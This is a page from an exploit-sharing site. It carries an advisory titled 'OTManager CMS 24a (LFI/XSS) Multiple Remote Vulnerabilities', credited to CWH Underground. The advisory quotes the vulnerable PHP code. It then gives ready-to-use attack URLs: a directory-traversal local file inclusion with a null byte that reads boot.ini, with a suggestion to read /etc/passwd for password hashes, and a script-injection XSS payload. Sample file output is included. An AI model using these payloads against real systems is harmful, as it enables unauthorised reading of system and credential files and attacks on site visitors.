0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
OTManager CMS 24a (LFI/XSS) Multiple Remote Vulnerabilities
=========================================================== OTManager CMS 24a (LFI/XSS) Multiple Remote Vulnerabilities =========================================================== ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' AUTHOR : CWH Underground DATE : 27 June 2008 ##################################################### APPLICATION : OTManager CMS VERSION : 24a Completo VENDOR : http://www.otmanager.org/ DOWNLOAD : http://downloads.sourceforge.net/otm/OTManager_v24a_Completo.zip ##################################################### --------------------------------------- Vulnerable File [index.php?conteudo=] --------------------------------------- @Line 76: if($_REQUEST['conteudo']==""){ 77: require("Principal.php"); 78: }else{ 79: if(!file_exists($_REQUEST['conteudo'].".php")){ 80: echo '<center><font size="3"><b>404 URL Invalida</b></font><br><br>Por Favor, Selecione o Conteudo no Menu ao Lado.</center>'; 81: }else{ 82: require($_REQUEST['conteudo'].".php"); 83: } 84: } --------- Exploit --------- ##### LFI ##### [+] http://[Target]/[otmanager_path]/index.php?conteudo=[LFI] This exploit will open boot.ini in system file: [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1) \WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1) \WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect You can change boot.ini to /etc/passwd%00 in linux OS, For view pass hash. ##### XSS ##### [+] http://[Target]/[otmanager_path]/index.php?conteudo=[XSS] ------------- POC Exploit ------------- ##### LFI ##### [+] http://192.168.24.25/otmanager/index.php?conteudo=../../../../../../../../boot.ini%00 ##### XSS ##### [+] http://192.168.24.25/otmanager/index.php?conteudo=</title><script>alert('XSS test');</script> ################################################################## # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## # 0day.today [2024-12-25] #